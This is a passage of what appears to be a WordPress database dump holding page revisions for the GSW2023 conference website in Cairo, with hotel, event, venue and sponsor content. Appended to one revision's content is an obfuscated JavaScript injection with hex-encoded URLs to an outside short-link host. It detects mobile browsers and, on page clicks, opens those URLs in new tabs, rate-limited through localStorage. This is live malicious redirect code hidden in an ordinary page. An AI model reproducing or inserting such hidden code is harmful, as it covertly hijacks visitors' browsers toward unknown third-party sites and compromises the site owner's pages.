August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:32:24','2023-08-26 20:32:24','',3066,'https://gsw2023.com/?p=5413',0,'revision','',0),
(5414,1,'2023-08-26 20:34:14','2023-08-26 20:34:14','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 